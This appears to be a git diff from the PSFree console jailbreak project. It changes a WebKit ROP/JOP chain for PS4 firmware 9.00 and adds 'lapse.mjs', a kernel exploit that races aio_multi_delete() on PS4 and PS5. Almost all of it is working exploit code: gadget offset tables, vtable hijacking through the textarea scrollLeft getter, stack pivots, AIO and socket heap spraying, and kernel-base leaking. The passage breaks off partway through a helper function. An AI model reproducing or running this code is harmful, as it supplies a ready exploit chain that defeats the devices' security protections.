-    debug_log(`setuid(): ${retval}`);
-    if (!retval.eq(0)) {
-        die('kpatch() failed');
-    }
-    debug_log('kernel exploit succeeded!');
-}
-
-async function get_patches(url) {
-    const response = await fetch(url);
-
-    if (!response.ok) {
-        throw Error(
-            `Network response was not OK, status: ${response.status}\n`
-            + `failed to fetch: ${url}`
-        );
-    }
-
-    return await response.arrayBuffer();
-}
-
-async function kexploit() {
-    init(Chain);
-    const kchain = new Chain();
-
-    mlock_gadgets(gadgets);
-    mlock_kchain(kchain);
-    const [
-        mmap_area,
-        mmap_area_size,
-        jop_buffer,
-        rax_ptrs,
-        scratch,
-    ] = prepare_knote(kchain);
-    const [sd, kretval] = trigger_oob(kchain, mmap_area);
-
-    // offset relative to kernel base
-    const offset_k_socketops_fo_chmod = 0x1a76060;
-    kbase = kretval.sub(offset_k_socketops_fo_chmod);
-    debug_log(`kbase: ${kbase}`);
-
-    // setup for fchmod() kernel ROP chain
-    mmap_area.write64(8, jop_buffer);
-    rax_ptrs.write64(0x70, kchain.get_gadget(jop3));
-
-    const p_ucred = get_ucred_addr(kchain, sd, mmap_area);
-    debug_log(`p_ucred: ${p_ucred}`);
-
-    get_jit_capabilities(kchain, sd, mmap_area, p_ucred);
-    await kexec_payload(kchain, sd, mmap_area, scratch);
-}
-
-kexploit();
diff --git a/rop/900.mjs b/rop/900.mjs
index cedb3eb..bc57556 100644
--- a/rop/900.mjs
+++ b/rop/900.mjs
@@ -17,13 +17,13 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
 // by janisslsm (John) from ps4-dev discord
 
-import * as config from '../config.mjs';
+import * as config from '/config.mjs';
 
-import { Int } from '../module/int64.mjs';
-import { debug_log, die } from '../module/utils.mjs';
-import { Addr, mem } from '../module/mem.mjs';
-import { KB, MB } from '../module/constants.mjs';
-import { ChainBase } from '../module/chain.mjs';
+import { Int } from '/module/int64.mjs';
+import { log, align, die } from '/module/utils.mjs';
+import { Addr, mem } from '/module/mem.mjs';
+import { KB, MB } from '/module/constants.mjs';
+import { ChainBase } from '/module/chain.mjs';
 
 import {
     make_buffer,
@@ -31,10 +31,10 @@ import {
     get_view_vector,
     resolve_import,
     init_syscall_array,
-} from '../module/memtools.mjs';
+} from '/module/memtools.mjs';
 
-import * as rw from '../module/rw.mjs';
-import * as o from '../module/offset.mjs';
+import * as rw from '/module/rw.mjs';
+import * as o from '/module/offset.mjs';
 
 const origin = window.origin;
 const port = '8000';
@@ -42,7 +42,9 @@ const url = `${origin}:${port}`;
 
 const syscall_array = [];
 
+const offset_func_exec = 0x18;
 const offset_textarea_impl = 0x18;
+const offset_js_inline_prop = 0x10;
 
 // WebKit offsets of imported functions
 const offset_wk_stack_chk_fail = 0x178;
@@ -66,55 +68,64 @@ let setjmp_addr = null;
 let longjmp_addr = null;
 
 // libSceNKWebKit.sprx
-let libwebkit_base = null;
+export let libwebkit_base = null;
 // libkernel_web.sprx
-let libkernel_base = null;
+export let libkernel_base = null;
 // libSceLibcInternal.sprx
-let libc_base = null;
+export let libc_base = null;
 
-// Chain implementation based on Chain800. Replaced offsets that changed
+// Chain implementation based on Chain803. Replaced offsets that changed
 // between versions. Replaced gadgets that were missing with new ones that
 // won't change the API.
-
+//
 // gadgets for the JOP chain
 //
+// Why these JOP chain gadgets are not named jop1-3 and jop2-5 not jop4-7 is
+// because jop1-5 was the original chain used by the old implementation of
+// Chain803. Now the sequence is ta_jop1-3 then to jop2-5.
+//
 // When the scrollLeft getter native function is called on PS4 9.00, rsi is the
 // JS wrapper for the WebCore textarea class.
-const jop1 = `
-mov rdi, qword ptr [rsi + 0x20]
+const ta_jop1 = `
+mov rdi, qword ptr [rsi + 0x18]
 mov rax, qword ptr [rdi]
-call qword ptr [rax + 0x28]
+call qword ptr [rax + 0xb8]
 `;
 // Since the method of code redirection we used is via redirecting a call to
 // jump to our JOP chain, we have the return address of the caller on entry.
 //
-// jop1 pushed another object (via the call instruction) but we want no extra
-// objects between the return address and the rbp that will be pushed by jop3
-// later. So we pop the return address pushed by jop1.
+// ta_jop1 pushed another object (via the call instruction) but we want no
+// extra objects between the return address and the rbp that will be pushed by
+// jop2 later. So we pop the return address pushed by ta_jop1.
 //
 // This will make pivoting back easy, just "leave; ret".
-const jop2 = `
-pop rcx
-jmp qword ptr [rax + 0x7d]
+const ta_jop2 = `
+pop rsi
+jmp qword ptr [rax + 0x1c]
+`;
+const ta_jop3 = `
+mov rdi, qword ptr [rax + 8]
+mov rax, qword ptr [rdi]
+jmp qword ptr [rax + 0x30]
 `;
 // rbp is now pushed, any extra objects pushed by the call instructions can be
 // ignored
-const jop3 = `
+const jop2 = `
 push rbp
 mov rbp, rsp
 mov rax, qword ptr [rdi]
 call qword ptr [rax + 0x58]
 `;
-const jop4 = `
+const jop3 = `
 mov rdx, qword ptr [rax + 0x18]
 mov rax, qword ptr [rdi]
 call qword ptr [rax + 0x10]
 `;
-const jop5 = `
+const jop4 = `
 push rdx
 jmp qword ptr [rax]
 `;
-const jop6 = 'pop rsp; ret';
+const jop5 = 'pop rsp; ret';
 
 // the ps4 firmware is compiled to use rbp as a frame pointer
 //
@@ -130,11 +141,6 @@ const jop6 = 'pop rsp; ret';
 //     pop rbp
 const rop_epilogue = 'leave; ret';
 
-const push_rdx_jmp = `
-push rdx
-jmp qword ptr [rax]
-`;
-
 const webkit_gadget_offsets = new Map(Object.entries({
     'pop rax; ret' : 0x0000000000051a12,
     'pop rbx; ret' : 0x00000000000be5d0,
@@ -162,22 +168,27 @@ const webkit_gadget_offsets = new Map(Object.entries({
     'neg rax; and rax, rcx; ret' : 0x00000000019771c4,
     'adc esi, esi; ret' : 0x000000000148874e,
     'add rax, rdx; ret' : 0x00000000003f662c,
+    'push rsp; jmp qword ptr [rax]' : 0x0000000002bae87f,
     'add rcx, rsi; and rdx, rcx; or rax, rdx; ret' : 0x0000000001b1ed66,
     'pop rsi; jmp qword ptr [rax + 0x1c]' : 0x00000000021fce7e,
 
     'mov qword ptr [rdi], rsi; ret' : 0x0000000000040300,
     'mov rax, qword ptr [rax]; ret' : 0x00000000000241cc,
     'mov qword ptr [rdi], rax; ret' : 0x000000000000613b,
+    'mov dword ptr [rdi], eax; ret' : 0x000000000000613c,
     'mov rdx, rcx; ret' : 0x000000000157fe71,
 
-    [push_rdx_jmp] : 0x00000000028bd332,
+    'mov dword ptr [rax], esi; ret' : 0x00000000005c3482,
+    'mov dword ptr [rdi], eax; ret' : 0x000000000000613c,
 
-    [jop1] : 0x0000000000f2c778,
-    [jop2] : 0x0000000002c326c2,
-    [jop3] : 0x0000000000683800,
-    [jop4] : 0x0000000000303906,
-    [jop5] : 0x00000000028bd332,
-    [jop6] : 0x000000000004e293,
+    [jop2] : 0x0000000000683800,
+    [jop3] : 0x0000000000303906,
+    [jop4] : 0x00000000028bd332,
+    [jop5] : 0x000000000004e293,
+
+    [ta_jop1] : 0x00000000004e62a4,
+    [ta_jop2] : 0x00000000021fce7e,
+    [ta_jop3] : 0x00000000019becb4,
 }));
 
 const libc_gadget_offsets = new Map(Object.entries({
@@ -186,9 +197,16 @@ const libc_gadget_offsets = new Map(Object.entries({
     'mov qword ptr [rsi], rcx; ret' : 0x00000000000cf982,
     'setjmp' : offset_libc_setjmp,
     'longjmp' : offset_libc_longjmp,
+    //'getcontext' : 0x258f4,
+    'setcontext' : 0x638,
 }));
 
-const gadgets = new Map();
+const libkernel_gadget_offsets = new Map(Object.entries({
+    // returns the location of errno
+    '__error' : 0xCB80,
+}));
+
+export const gadgets = new Map();
 
 function get_bases() {
     const textarea = document.createElement('textarea');
@@ -200,11 +218,15 @@ function get_bases() {
         libwebkit_base
         .add(offset_wk_stack_chk_fail)
     ;
-    const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
+    const stack_chk_fail_addr = resolve_import(
+        stack_chk_fail_import,
+        true,
+        true
+    );
     const libkernel_base = find_base(stack_chk_fail_addr, true, true);
 
     const memcpy_import = libwebkit_base.add(offset_wk_memcpy);
-    const memcpy_addr = resolve_import(memcpy_import);
+    const memcpy_addr = resolve_import(memcpy_import, true, true);
     const libc_base = find_base(memcpy_addr, true, true);
 
     return [
@@ -214,7 +236,7 @@ function get_bases() {
     ];
 }
 
-function init_gadget_map(gadget_map, offset_map, base_addr) {
+export function init_gadget_map(gadget_map, offset_map, base_addr) {
     for (const [insn, offset] of offset_map) {
         gadget_map.set(insn, base_addr.add(offset));
     }
@@ -229,11 +251,13 @@ class Chain900Base extends ChainBase {
         this.flag = new Uint8Array(8);
         this.flag_addr = get_view_vector(this.flag);
         this.jmp_target = new Uint8Array(0x100);
-        rw.write64(this.jmp_target, 0x1c, this.get_gadget(push_rdx_jmp));
-        rw.write64(this.jmp_target, 0, this.get_gadget('pop rsp; ret'));
+        rw.write64(this.jmp_target, 0x1c, this.get_gadget(jop4));
+        rw.write64(this.jmp_target, 0, this.get_gadget(jop5));
 
         // for save/restore
         this.is_saved = false;
+        this.is_stale = false;
+        this.position = 0;
         const jmp_buf_size = 0xc8;
         this.jmp_buf = new Uint8Array(jmp_buf_size);
         this.jmp_buf_p = get_view_vector(this.jmp_buf);
@@ -270,6 +294,7 @@ class Chain900Base extends ChainBase {
         super.clean();
         this._clean_branch_ctx();
         this.is_saved = false;
+        this.is_stale = false;
     }
 
     // Use start_branch() and end_branch() to delimit a ROP chain that will
@@ -449,8 +474,6 @@ class Chain900Base extends ChainBase {
         this.push_end();
         this.run();
         this.clean();
-
-        return this.return_value;
     }
 
     syscall(...args) {
@@ -462,79 +485,78 @@ class Chain900Base extends ChainBase {
         this.push_end();
         this.run();
         this.clean();
+    }
 
-        return this.return_value;
+        push_clear_errno() {
+        this.push_call(this.get_gadget('__error'));
+        this.push_gadget('pop rsi; ret');
+        this.push_value(0);
+        this.push_gadget('mov dword ptr [rax], esi; ret');
+    }
+
+        push_get_errno() {
+        this.push_gadget('pop rdi; ret');
+        this.push_value(this.errno_addr);
+
+        this.push_call(this.get_gadget('__error'));
+
+        this.push_gadget('mov rax, qword ptr [rax]; ret');
+        this.push_gadget('mov dword ptr [rdi], eax; ret');
+    }
+
+        check_stale() {
+        if (this.is_stale) {
+            throw Error('chain already ran, clean it first');
+        }
+        this.is_stale = true;
+    }
+        check_is_empty() {
+        if (this.position === 0) {
+            throw Error('chain is empty');
+        }
     }
 }
 
-// helper object for ROP
-const rop_ta = document.createElement('textarea');
-
 // Chain for PS4 9.00
-class Chain900 extends Chain900Base {
+export class Chain900 extends Chain900Base {
     constructor() {
         super();
 
-        // sizeof JSC:JSObject, the JSCell + the butterfly field
-        const js_size = 0x10;
-        // sizeof WebCore::JSHTMLTextAreaElement, subclass of JSObject
-        const js_ta_size = 0x20;
-        // start of the array of inline properties (JSValues)
-        const offset_js_inline_prop = 0x10;
-        // Sizes may vary between webkit versions so we just assume a size
-        // that we think is large enough for all of them.
-        const vtable_size = 0x1000;
-        const webcore_ta_size = 0x180;
-
-        const ta_clone = {};
-        this.ta_clone = ta_clone;
-        const clone_p = mem.addrof(ta_clone);
-        const ta_p = mem.addrof(rop_ta);
-
-        for (let i = js_size; i < js_ta_size; i += 8) {
-            clone_p.write64(i, ta_p.read64(i));
-        }
-
-        const webcore_ta = ta_p.readp(offset_textarea_impl);
-        const m_wrapped_clone = new Uint8Array(
-            make_buffer(webcore_ta, webcore_ta_size)
-        );
-        this.m_wrapped_clone = m_wrapped_clone;
-
-        // Replicate the vtable as much as possible or else the garbage
-        // collector will crash. It uses functions from the vtable.
+        const textarea = document.createElement('textarea');
+        this.textarea = textarea;
+        const js_ta = mem.addrof(textarea);
+        const webcore_ta = js_ta.readp(0x18);
+        this.webcore_ta = webcore_ta;
+        // Only offset 0x1c8 will be used when calling the scrollLeft getter
+        // native function (our tests don't crash).
         //
-        // There is no need to restore the original vtable pointer later since
-        // it points to a copy with only offset 0x1b8 changed. The scrollLeft
-        // getter is not used by the GC.
-        const vtable_clone = new Uint8Array(
-            make_buffer(webcore_ta.readp(0), vtable_size)
-        );
-        this.vtable_clone = vtable_clone
-
-        clone_p.write64(
-            offset_textarea_impl,
-            get_view_vector(m_wrapped_clone),
-        );
-        rw.write64(m_wrapped_clone, 0, get_view_vector(vtable_clone));
-
-        clone_p.write64(0, ta_p.read64(0));
+        // This implies we don't need to know the exact size of the vtable and
+        // try to copy it as much as possible to avoid a crash due to missing
+        // vtable entries.
+        //
+        // So the rest of the vtable are free for our use.
+        const vtable = new Uint8Array(0x200);
+        const old_vtable_p = webcore_ta.readp(0);
+        this.vtable = vtable;
+        this.old_vtable_p = old_vtable_p;
 
         // 0x1b8 is the offset of the scrollLeft getter native function
-        rw.write64(vtable_clone, 0x1b8, this.get_gadget(jop1));
+        rw.write64(vtable, 0x1b8, this.get_gadget(ta_jop1));
+        rw.write64(vtable, 0xb8, this.get_gadget(ta_jop2));
+        rw.write64(vtable, 0x1c, this.get_gadget(ta_jop3));
 
         // for the JOP chain
         const rax_ptrs = new Uint8Array(0x100);
         const rax_ptrs_p = get_view_vector(rax_ptrs);
         this.rax_ptrs = rax_ptrs;
 
-        rw.write64(rax_ptrs, 0x28, this.get_gadget(jop2));
-        rw.write64(rax_ptrs, 0x7d, this.get_gadget(jop3));
-        rw.write64(rax_ptrs, 0x58, this.get_gadget(jop4));
-        rw.write64(rax_ptrs, 0x10, this.get_gadget(jop5));
-        rw.write64(rax_ptrs, 0, this.get_gadget(jop6));
+        //rw.write64(rax_ptrs, 8, this.get_gadget(jop2));
+        rw.write64(rax_ptrs, 0x30, this.get_gadget(jop2));
+        rw.write64(rax_ptrs, 0x58, this.get_gadget(jop3));
+        rw.write64(rax_ptrs, 0x10, this.get_gadget(jop4));
+        rw.write64(rax_ptrs, 0, this.get_gadget(jop5));
         // value to pivot rsp to
-        rw.write64(rax_ptrs, 0x18, this.stack_addr);
+        rw.write64(this.rax_ptrs, 0x18, this.stack_addr);
 
         const jop_buffer = new Uint8Array(8);
         const jop_buffer_p = get_view_vector(jop_buffer);
@@ -542,7 +564,7 @@ class Chain900 extends Chain900Base {
 
         rw.write64(jop_buffer, 0, rax_ptrs_p);
 
-        clone_p.write64(offset_js_inline_prop + 8*2, jop_buffer_p);
+        rw.write64(vtable, 8, jop_buffer_p);
     }
 
     run() {
@@ -550,20 +572,25 @@ class Chain900 extends Chain900Base {
         this.check_is_empty();
         this.check_is_branching();
 
+        // change vtable
+        this.webcore_ta.write64(0, get_view_vector(this.vtable));
         // jump to JOP chain
-        this.ta_clone.scrollLeft;
+        this.textarea.scrollLeft;
+        // restore vtable
+        this.webcore_ta.write64(0, this.old_vtable_p);
     }
 }
-const Chain = Chain900;
+export const Chain = Chain900;
 
-function init(Chain) {
+export function init(Chain) {
     [libwebkit_base, libkernel_base, libc_base] = get_bases();
 
     init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
     init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
+    init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
     init_syscall_array(syscall_array, libkernel_base, 300 * KB);
-    debug_log('syscall_array:');
-    debug_log(syscall_array);
+    log('syscall_array:');
+    log(syscall_array);
     Chain.init_class(gadgets, syscall_array);
 }
 
@@ -585,26 +612,26 @@ function test_rop(Chain) {
 
     chain.start_branch();
 
-    debug_log(`if chain addr: ${chain.stack_addr.add(chain.position)}`);
+    log(`if chain addr: ${chain.stack_addr.add(chain.position)}`);
     chain.push_call(longjmp_addr, jmp_buf_p);
 
     chain.end_branch();
 
-    debug_log(`endif chain addr: ${chain.stack_addr.add(chain.position)}`);
+    log(`endif chain addr: ${chain.stack_addr.add(chain.position)}`);
     chain.push_end();
 
     // The ROP chain is a noop. If we crashed, then we did something wrong.
     alert('chain run');
-    debug_log('test call setjmp()/longjmp()');
+    log('test call setjmp()/longjmp()');
     chain.run()
     alert('returned successfully');
-    debug_log('returned successfully');
-    debug_log('jmp_buf:');
-    debug_log(jmp_buf);
-    debug_log(`flag: ${rw.read64(chain.flag, 0)}`);
+    log('returned successfully');
+    log('jmp_buf:');
+    log(jmp_buf);
+    log(`flag: ${rw.read64(chain.flag, 0)}`);
 
     const state1 = new Uint8Array(8);
-    debug_log('test if rax == 0');
+    log('test if rax == 0');
     chain.clean();
 
     chain.push_gadget('pop rsi; ret');
@@ -630,13 +657,13 @@ function test_rop(Chain) {
     chain.push_end();
 
     chain.run();
-    debug_log(`state1 must be 1: ${state1}`);
+    log(`state1 must be 1: ${state1}`);
     if (state1[0] !== 1) {
         die('if branch not taken');
     }
 
     const state2 = new Uint8Array(8);
-    debug_log('test if rax != 0');
+    log('test if rax != 0');
     chain.clean();
 
     chain.push_gadget('pop rsi; ret');
@@ -662,24 +689,25 @@ function test_rop(Chain) {
     chain.push_end();
 
     chain.run();
-    debug_log(`state2 must be 2: ${state2}`);
+    log(`state2 must be 2: ${state2}`);
     if (state2[0] !== 2) {
         die('if branch taken');
     }
 
-    debug_log('test syscall getuid()');
+    log('test syscall getuid()');
     chain.clean();
     // Set the return value to some random value. If the syscall worked, then
     // it will likely change.
     const magic = 0x4b435546;
     rw.write32(chain._return_value, 0, magic);
 
-    const res = chain.syscall('getuid');
+    chain.syscall('getuid');
 
-    debug_log(`return value: ${res}`);
-    if (res.eq(magic)) {
+    log(`return value: ${chain.return_value}`);
+    if (chain.return_value.low() === magic) {
         die('syscall getuid failed');
     }
 }
 
-test_rop(Chain);
+log('Chain900');
+//test_rop(Chain);
diff --git a/scripts/lapse.mjs b/scripts/lapse.mjs
new file mode 100644
index 0000000..0df2697
--- /dev/null
+++ b/scripts/lapse.mjs
@@ -0,0 +1,1739 @@
+/* Copyright (C) 2025 anonymous
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
+
+// Lapse is a kernel exploit for PS4 [5.00, 12.50) and PS5 [1.00-10.20). It
+// takes advantage of a bug in aio_multi_delete(). Take a look at the comment
+// at the race_one() function here for a brief summary.
+
+// debug comment legend:
+// * PANIC - code will make the system vulnerable to a kernel panic or it will
+//   perform a operation that might panic
+// * RESTORE - code will repair kernel panic vulnerability
+// * MEMLEAK - memory leaks that our code will induce
+
+import { Int } from '/module/int64.mjs';
+import { mem } from '/module/mem.mjs';
+import { log, die, hex, hexdump } from '/module/utils.mjs';
+import { cstr, jstr } from '/module/memtools.mjs';
+import { page_size, context_size } from '/module/offset.mjs';
+import { Chain } from '/module/chain.mjs';
+
+import {
+    View1, View2, View4,
+    Word, Long, Pointer,
+    Buffer,
+} from '/module/view.mjs';
+
+import * as rop from '/module/chain.mjs';
+import * as config from '/config.mjs';
+
+const t1 = performance.now();
+
+// check if we are running on a supported firmware version
+const [is_ps4, version] = (() => {
+    const value = config.target;
+    const is_ps4 = (value & 0x10000) === 0;
+    const version = value & 0xffff;
+    const [lower, upper] = (() => {
+        if (is_ps4) {
+            return [0x100, 0x1250];
+        } else {
+            return [0x100, 0x1020];
+        }
+    })();
+
+    if (!(lower <= version && version < upper)) {
+        throw RangeError(`invalid config.target: ${hex(value)}`);
+    }
+
+    return [is_ps4, version];
+})();
+
+// sys/socket.h
+const AF_UNIX = 1;
+const AF_INET = 2;
+const AF_INET6 = 28;
+const SOCK_STREAM = 1;
+const SOCK_DGRAM = 2;
+const SOL_SOCKET = 0xffff;
+const SO_REUSEADDR = 4;
+const SO_LINGER = 0x80;
+
+// netinet/in.h
+const IPPROTO_TCP = 6;
+const IPPROTO_UDP = 17;
+const IPPROTO_IPV6 = 41;
+
+// netinet/tcp.h
+const TCP_INFO = 0x20;
+const size_tcp_info = 0xec;
+
+// netinet/tcp_fsm.h
+const TCPS_ESTABLISHED = 4;
+
+// netinet6/in6.h
+const IPV6_2292PKTOPTIONS = 25;
+const IPV6_PKTINFO = 46;
+const IPV6_NEXTHOP = 48;
+const IPV6_RTHDR = 51;
+const IPV6_TCLASS = 61;
+
+// sys/cpuset.h
+const CPU_LEVEL_WHICH = 3;
+const CPU_WHICH_TID = 1;
+
+// sys/mman.h
+const MAP_SHARED = 1;
+const MAP_FIXED = 0x10;
+
+// sys/rtprio.h
+const RTP_SET = 1;
+const RTP_PRIO_REALTIME = 2;
+
+// SceAIO has 2 SceFsstAIO workers for each SceAIO Parameter. each Parameter
+// has 3 queue groups: 4 main queues, 4 wait queues, and one unused queue
+// group. queue 0 of each group is currently unused. queue 1 has the lowest
+// priority and queue 3 has the highest
+//
+// the SceFsstAIO workers will process entries at the main queues. they will
+// refill the main queues from the corresponding wait queues each time they
+// dequeue a request (e.g. fill the  low priority main queue from the low
+// priority wait queue)
+//
+// entries on the wait queue will always have a 0 ticket number. they will
+// get assigned a nonzero ticket number once they get put on the main queue
+const AIO_CMD_READ = 1;
+const AIO_CMD_WRITE = 2;
+const AIO_CMD_FLAG_MULTI = 0x1000;
+const AIO_CMD_MULTI_READ = AIO_CMD_FLAG_MULTI | AIO_CMD_READ;
+const AIO_STATE_COMPLETE = 3;
+const AIO_STATE_ABORTED = 4;
+const num_workers = 2;
+// max number of requests that can be created/polled/canceled/deleted/waited
+const max_aio_ids = 0x80;
+
+// highest priority we can achieve given our credentials
+const rtprio = View2.of(RTP_PRIO_REALTIME, 0x100);
+
+// CONFIG CONSTANTS
+const main_core = 7;
+const num_grooms = 0x200;
+const num_handles = 0x100;
+const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
+const num_alias = 10;
+const num_races = 100;
+const leak_len = 16;
+const num_leaks = 5;
+const num_clobbers = 8;
+
+let chain = null;
+async function init() {
+    await rop.init();
+    chain = new Chain();
+
+    // TODO assumes ps4 9.0x
+    const pthread_offsets = new Map(Object.entries({
+        'pthread_create' : 0x25510,
+        'pthread_join' : 0xAFA0,
+        'pthread_barrier_init' : 0x273D0,
+        'pthread_barrier_wait' : 0xA320,
+        'pthread_barrier_destroy' : 0xFEA0,
+        'pthread_exit' : 0x77A0,
+    }));
+
+    rop.init_gadget_map(rop.gadgets, pthread_offsets, rop.libkernel_base);
+
+}
+
+function sys_void(...args) {
+    return chain.syscall_void(...args);
+}
+
+function sysi(...args) {
+    return chain.sysi(...args);
+}
+
+function call_nze(...args) {
+    const res = chain.call_int(...args);
+    if (res !== 0) {
+        die(`call(${args[0]}) returned nonzero: ${res}`);
+    }
+}
+
+// #define SCE_KERNEL_AIO_STATE_NOTIFIED       0x10000
+//
+// #define SCE_KERNEL_AIO_STATE_SUBMITTED      1
+// #define SCE_KERNEL_AIO_STATE_PROCESSING     2
+// #define SCE_KERNEL_AIO_STATE_COMPLETED      3
+// #define SCE_KERNEL_AIO_STATE_ABORTED        4
+//
+// typedef struct SceKernelAioResult {
+//     // errno / SCE error code / number of bytes processed
+//     int64_t returnValue;
+//     // SCE_KERNEL_AIO_STATE_*
+//     uint32_t state;
+// } SceKernelAioResult;
+//
+// typedef struct SceKernelAioRWRequest {
+//     off_t offset;
+//     size_t nbyte;
+//     void *buf;
+//     struct SceKernelAioResult *result;
+//     int fd;
+// } SceKernelAioRWRequest;
+//
+// typedef int SceKernelAioSubmitId;
+//
+// // SceAIO submit commands
+// #define SCE_KERNEL_AIO_CMD_READ     0x001
+// #define SCE_KERNEL_AIO_CMD_WRITE    0x002
+// #define SCE_KERNEL_AIO_CMD_MASK     0xfff
+// // SceAIO submit command flags
+// #define SCE_KERNEL_AIO_CMD_MULTI 0x1000
+//
+// #define SCE_KERNEL_AIO_PRIORITY_LOW     1
+// #define SCE_KERNEL_AIO_PRIORITY_MID     2
+// #define SCE_KERNEL_AIO_PRIORITY_HIGH    3
+//
+// int
+// aio_submit_cmd(
+//     u_int cmd,
+//     SceKernelAioRWRequest reqs[],
+//     u_int num_reqs,
+//     u_int prio,
+//     SceKernelAioSubmitId ids[]
+// );
+function aio_submit_cmd(cmd, requests, num_requests, handles) {
+    sysi('aio_submit_cmd', cmd, requests, num_requests, 3, handles);
+}
+
+// the various SceAIO syscalls that copies out errors/states will not check if
+// the address is NULL and will return EFAULT. this dummy buffer will serve as
+// the default argument so users don't need to specify one
+const _aio_errors = new View4(max_aio_ids);
+const _aio_errors_p = _aio_errors.addr;
+
+// int
+// aio_multi_delete(
+//     SceKernelAioSubmitId ids[],
+//     u_int num_ids,
+//     int sce_errors[]
+// );
+function aio_multi_delete(ids, num_ids, sce_errs=_aio_errors_p) {
+    sysi('aio_multi_delete', ids, num_ids, sce_errs);
+}
+
+// int
+// aio_multi_poll(
+//     SceKernelAioSubmitId ids[],
+//     u_int num_ids,
+//     int states[]
+// );
+function aio_multi_poll(ids, num_ids, sce_errs=_aio_errors_p) {
+    sysi('aio_multi_poll', ids, num_ids, sce_errs);
+}
+
+// int
+// aio_multi_cancel(
+//     SceKernelAioSubmitId ids[],
+//     u_int num_ids,
+//     int states[]
+// );
+function aio_multi_cancel(ids, num_ids, sce_errs=_aio_errors_p) {
+    sysi('aio_multi_cancel', ids, num_ids, sce_errs);
+}
+
+// // wait for all (AND) or atleast one (OR) to finish
+// // DEFAULT is the same as AND
+// #define SCE_KERNEL_AIO_WAIT_DEFAULT 0x00
+// #define SCE_KERNEL_AIO_WAIT_AND     0x01
+// #define SCE_KERNEL_AIO_WAIT_OR      0x02
+//
+// int
+// aio_multi_wait(
+//     SceKernelAioSubmitId ids[],
+//     u_int num_ids,
+//     int states[],
+//     // SCE_KERNEL_AIO_WAIT_*
+//     uint32_t mode,
+//     useconds_t *timeout
+// );
+function aio_multi_wait(ids, num_ids, sce_errs=_aio_errors_p) {
+    sysi('aio_multi_wait', ids, num_ids, sce_errs, 1, 0);
+}
+
+function make_reqs1(num_reqs) {
+    const reqs1 = new Buffer(0x28 * num_reqs);
+    for (let i = 0; i < num_reqs; i++) {
+        // .fd = -1
+        reqs1.write32(0x20 + i*0x28, -1);
+    }
+    return reqs1;
+}
+
+function spray_aio(
+    loops=1, reqs1_p, num_reqs, ids_p, multi=true, cmd=AIO_CMD_READ,
+) {
+    const step = 4 * (multi ? num_reqs : 1);
+    cmd |= multi ? AIO_CMD_FLAG_MULTI : 0;
+    for (let i = 0, idx = 0; i < loops; i++) {
+        aio_submit_cmd(cmd, reqs1_p, num_reqs, ids_p.add(idx));
+        idx += step;
+    }
+}
+
+function poll_aio(ids, states, num_ids=ids.length) {
+    if (states !== undefined) {
+        states = states.addr;
+    }
+    aio_multi_poll(ids.addr, num_ids, states);
+}
+
+function cancel_aios(ids_p, num_ids) {
+    const len = max_aio_ids;
+    const rem = num_ids % len;
+    const num_batches = (num_ids - rem) / len;
+    for (let bi = 0; bi < num_batches; bi++) {
+        aio_multi_cancel(ids_p.add((bi << 2) * len), len);
+    }
+    if (rem) {
+        aio_multi_cancel(ids_p.add((num_batches << 2) * len), rem);
+    }
+}
+
+function free_aios(ids_p, num_ids) {
+    const len = max_aio_ids;
+    const rem = num_ids % len;
+    const num_batches = (num_ids - rem) / len;
+    for (let bi = 0; bi < num_batches; bi++) {
+        const addr = ids_p.add((bi << 2) * len);
+        aio_multi_cancel(addr, len);
+        aio_multi_poll(addr, len);
+        aio_multi_delete(addr, len);
+    }
+    if (rem) {
+        const addr = ids_p.add((num_batches << 2) * len);
+        aio_multi_cancel(addr, len);
+        aio_multi_poll(addr, len);
+        aio_multi_delete(addr, len);
+    }
+}
+
+function free_aios2(ids_p, num_ids) {
+    const len = max_aio_ids;
+    const rem = num_ids % len;
+    const num_batches = (num_ids - rem) / len;
+    for (let bi = 0; bi < num_batches; bi++) {
+        const addr = ids_p.add((bi << 2) * len);
+        aio_multi_poll(addr, len);
+        aio_multi_delete(addr, len);
+    }
+    if (rem) {
+        const addr = ids_p.add((num_batches << 2) * len);
+        aio_multi_poll(addr, len);
+        aio_multi_delete(addr, len);
+    }
+}
+
+function get_our_affinity(mask) {
+    sysi(
+        'cpuset_getaffinity',
+        CPU_LEVEL_WHICH,
+        CPU_WHICH_TID,
+        -1,
+        8,
+        mask.addr,
+    );
+}
+
+function set_our_affinity(mask) {
+    sysi(
+        'cpuset_setaffinity',
+        CPU_LEVEL_WHICH,
+        CPU_WHICH_TID,
+        -1,
+        8,
+        mask.addr,
+    );
+}
+
+function close(fd) {
+    sysi('close', fd);
+}
+
+function new_socket() {
+    return sysi('socket', AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
+}
+
+function new_tcp_socket() {
+    return sysi('socket', AF_INET, SOCK_STREAM, 0);
+}
+
+function gsockopt(sd, level, optname, optval, optlen) {
+    const size = new Word(optval.size);
+    if (optlen !== undefined) {
+        size[0] = optlen;
+    }
+
+    sysi('getsockopt', sd, level, optname, optval.addr, size.addr);
+    return size[0];
+}
+
+function setsockopt(sd, level, optname, optval, optlen) {
+    sysi('setsockopt', sd, level, optname, optval, optlen);
+}
+
+function ssockopt(sd, level, optname, optval, optlen) {
+    if (optlen === undefined) {
+        optlen = optval.size;
+    }
+
+    const addr = optval.addr;
+    setsockopt(sd, level, optname, addr, optlen);
+}
+
+function get_rthdr(sd, buf, len) {
+    return gsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
+}
+
+function set_rthdr(sd, buf, len) {
+    ssockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
+}
+
+function free_rthdrs(sds) {
+    for (const sd of sds) {
+        setsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, 0, 0);
+    }
+}
+
+function build_rthdr(buf, size) {
+    const len = ((size >> 3) - 1) & ~1;
